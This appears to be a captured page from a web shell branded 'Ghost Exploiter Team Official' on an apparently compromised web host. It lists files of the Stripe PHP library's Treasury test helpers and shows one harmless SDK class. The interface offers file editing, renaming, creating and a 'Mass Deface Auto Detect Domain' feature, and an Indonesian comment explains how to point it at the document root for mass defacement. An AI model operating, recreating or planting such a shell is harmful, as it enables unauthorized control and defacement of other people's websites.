webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
stripe
/
stripe-php
/
lib
/
Service
/
TestHelpers
/
Treasury
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
InboundTransferService.php
2.14KB
edt
ren
OutboundPaymentService.php
2.112KB
edt
ren
OutboundTransferService
...
2.126KB
edt
ren
ReceivedCreditService.php
0.76KB
edt
ren
ReceivedDebitService.php
0.755KB
edt
ren
TreasuryServiceFactory.php
1.038KB
edt
ren
<?php // File generated from our OpenAPI spec namespace Stripe\Service\TestHelpers\Treasury; class ReceivedCreditService extends \Stripe\Service\AbstractService { /** * Use this endpoint to simulate a test mode ReceivedCredit initiated by a third * party. In live mode, you can’t directly create ReceivedCredits initiated by * third parties. * * @param null|array $params * @param null|array|\Stripe\Util\RequestOptions $opts * * @throws \Stripe\Exception\ApiErrorException if the request fails * * @return \Stripe\Treasury\ReceivedCredit */ public function create($params = null, $opts = null) { return $this->request('post', '/v1/test_helpers/treasury/received_credits', $params, $opts); } }
<=Back
Liking